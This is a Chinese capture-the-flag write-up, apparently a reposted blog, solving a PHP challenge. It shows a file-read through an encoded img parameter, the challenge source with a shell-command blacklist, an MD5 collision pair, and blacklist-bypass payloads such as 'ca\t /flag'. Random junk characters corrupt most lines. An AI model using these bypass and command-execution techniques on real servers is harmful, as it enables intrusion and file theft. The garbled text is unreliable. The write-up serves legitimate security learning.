|
|
8 l1 J6 ^/ h; {<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
! `% l+ D: j3 ], j, s1 r<p> </p>0 R' p# F8 t) w) _% N9 q
<p> </p>
5 |, o! Z9 g3 S1 f' K<p> 题目打开如下,?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=,同时查看源代码</p>! Z: ?0 R& D. O7 F% H
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>& u0 \3 S& m( R) z2 V# E i
<p> </p>
M4 I% `4 K: B! [<p> </p>7 D& q C& t+ S* p7 F+ Q
<p>这里有个MD5 is funny,说明这个题目大概率跟MD5有关</p>
1 ?6 ]2 ?1 V$ s5 Y: o<p>然后我抓包了一下,消息头里面没有什么特殊的东西,于是我尝试从url入手</p>; \' ^4 m1 x" b7 ~
<p>首先把那个进行一次base64位解码</p>, A# p- {* Q$ v* Z! |5 }) m
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
" b2 S. G" A" |& M) {<p> </p>% ~5 s- G% M1 \5 X4 J
<p> </p>+ N; E( H/ B, N7 K0 s( v7 c
<p> 解码一次以后还是很像base64编码,于是又解码一次</p>
' a# d! a; H/ J<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
' Y. y3 x# I/ T! m7 T! D<p> </p> c5 h6 x5 g6 z/ u2 o8 _, K" A, T# ~
<p> </p>% y2 i/ x+ u( x1 u, o
<p> 然后用hex解码一下得到了</p>+ h3 T1 u0 {' o3 S" ` A
<div class="cnblogs_Highlighter">% L# {& d4 x6 I1 M; ^% E2 @; U
<pre class="brush:sql;gutter:true;">555.png
V: I9 F; l, ?" Q d</pre>5 P" w$ O5 c/ g' s* f
</div>
, v8 \: W! L) O* O$ I% @0 V, j/ M<p> 用同样的方法把index.php进行加密</p>
' ]8 ~3 T7 x. ^! l3 n6 F<div class="cnblogs_Highlighter">
7 Q! V- f" U/ Z+ j) o<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
9 B. n( n$ M7 k3 o$ j6 Q</pre>+ \8 H" ]4 s3 K
</div>
" k3 o, ^- s5 l8 {) w<p> 然后输入到地址栏</p># h5 I6 i4 ]* U" r
<p> 然后查看源代码,把源代码里面的那一串base64的编码解码</p>0 z* ?) A6 X0 g! r7 X: w- t- j2 S" J; w
<div class="cnblogs_code">
7 O: `: _3 |' c" y$ x5 `<pre><?<span style="color: rgba(0, 0, 0, 1)">php9 R) [' k2 ^8 E( D- i4 u( s8 T; R+ Z
</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);! W' C8 u! K# h- z8 i
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">); `6 |' |6 c) g4 W, T% j1 h
</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
$ j0 X4 |7 V% f i</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">])) % ]' m# d T( x4 d P
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='<span style="color: rgba(0, 0, 0, 1)">);7 _- O9 `, j4 X. v3 j( F6 ?5 a* c
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));
: N3 y" ` `' C
: W. ]1 q3 g# B</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);% q- v1 c5 Z" U6 I! S
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {. v* X0 L- b4 ^; V! p
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> '<img src ="./ctf3.jpeg">'<span style="color: rgba(0, 0, 0, 1)">;
2 O4 i4 j6 C. P4 w </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi~ no flag"<span style="color: rgba(0, 0, 0, 1)">);
. O/ e3 S2 S3 ~1 Q" v2 u0 u} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {& r& l* M) ^. d; B
</span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));3 @. f- s* J+ ~8 _
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'></img>"<span style="color: rgba(0, 0, 0, 1)">;3 D l( S+ N! G) D0 r/ G2 H0 y/ g
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;4 G( }% Z6 H8 L
}
# G+ n2 N; v: |( `$ w, e& R</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
m$ Z0 ~4 w, D</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;$ Z% N* o! X* v v; b
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
1 c* Q& f. N; a) I: J </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);7 e" S$ g7 _. O& d: s
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;1 N+ `" q f! G: g1 s5 F
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {* d/ l! x( S$ s ]0 l
</span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {+ C/ Q4 _1 g$ w/ Z4 J$ F- N
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
& i# |# q1 x+ C, x* m3 T } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {' o1 [5 @$ K2 e& H8 [4 s
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);( J" ^/ L- S" M7 q/ b6 d1 a
}
1 p6 A# M* y) W& j& M8 h}
9 Y) j+ j( \2 D' U/ e( `! e9 t$ I; E/ j I2 u/ u
</span>?>
! ]2 h( l* l2 b: J `$ h<html>
4 ~# B) T- `1 G$ Q! ?5 p/ {<style><span style="color: rgba(0, 0, 0, 1)">* K! g) E6 u; q) w
body{8 J7 k2 ^& u8 M& ?! T) x
background</span>:url(./bj.png) no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;& Z* Q2 k1 B/ y$ L; E! Z$ h9 I
background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;! {. N8 v, e& L
background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;, B0 W( |# f% R0 H! S s9 r
background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>3 B6 L. T' q5 y. T2 d0 D) a
<span style="color: rgba(0, 0, 0, 1)">}6 p0 K4 |/ s5 T: w
</span></style>
# D8 {2 k j! B$ Q+ U) B# a4 ]. s<body>) T5 N! ]* o# \- j- [, U9 L9 K
</body>; @6 E3 i) @( Z; a$ G' K
</html></pre>
2 ?& A/ H# k/ x' D</div>
2 Q: r& c; k1 W1 x- M- N# N: \5 Y<p>结合前面的推断,关键代码就在</p>0 I. |1 [! g* K x% T
<div class="cnblogs_code">0 s* h, B/ H: A2 o5 s+ `" h
<pre> <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {. I7 t9 i3 i4 e& T2 G
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;' X+ A) F9 M5 w
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {6 |0 Q i/ h/ T* u7 f
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
* L) N- j ? ?8 Q6 ^* o }</span></pre>
/ R5 e& H' `3 p- O</div>
/ R6 @' M' o5 z1 y- @<p>这种MD5是md5强碰撞</p>
+ a' c- x ]" o2 m+ b9 J<div class="cnblogs_Highlighter">
9 u# x1 E1 e% p1 E) d7 A<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2' s" \4 B! R$ C$ F
</pre>
3 x! _* u b. v$ g$ i</div>
5 [% T; N, P$ t! G1 T( t: g4 G8 {<div class="cnblogs_Highlighter">, d5 R. U; Z% h. S7 N& e' Z
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2, X! y9 c$ X: _3 G, m; s6 C4 O
</pre>" N5 s* i( Q9 j% c7 l/ z* r: B
</div>; d1 l3 T( [: a8 I9 _
<p> 只需要这样就可以把cmd里面的当成命令来处理。</p>8 |# v( \* I* E3 z: O( n6 t& o
<p>于是采用payload:</p>6 a" u- M8 f& |/ I2 H. k# G, t" q' Q
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>/ d1 |0 D4 H: I- f5 M
<p> </p>
; h( R$ X1 ~3 U2 r<p> 因为'\'并没有被屏蔽所以可以这么绕过</p>
: C0 x1 h+ l( f, |7 V<p>ls和l\s在命令执行的时候结果是一样的。</p> m8 A0 ?; [: Z3 ]8 E
<p>然后发现根目录里面有/flag</p>" Q8 k4 ]5 e' `1 o: s/ k; w t: @: Z
<p>于是payload:</p>6 m5 A+ ~' Z/ \! x
<div class="cnblogs_Highlighter">1 |4 ]! k* e+ C/ X. D z- O) G
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
) h) j: \8 @4 j</pre>
" ^4 V' J* |% Y5 S; E3 Z& B</div>
, s. ^% L" g7 b) v& Y<p> 对于这个题目,因为他没有屏蔽sort和dir</p>
- H3 f% ` c% p2 T2 [9 U: M" A<p>所以查看也可以用dir来代替ls,cat可以用sort来代替。</p>
) I1 s( g1 D" @<p> </p>
4 ]% W9 d5 b, `0 \4 u |
|
发表于 2022-2-12 14:35:42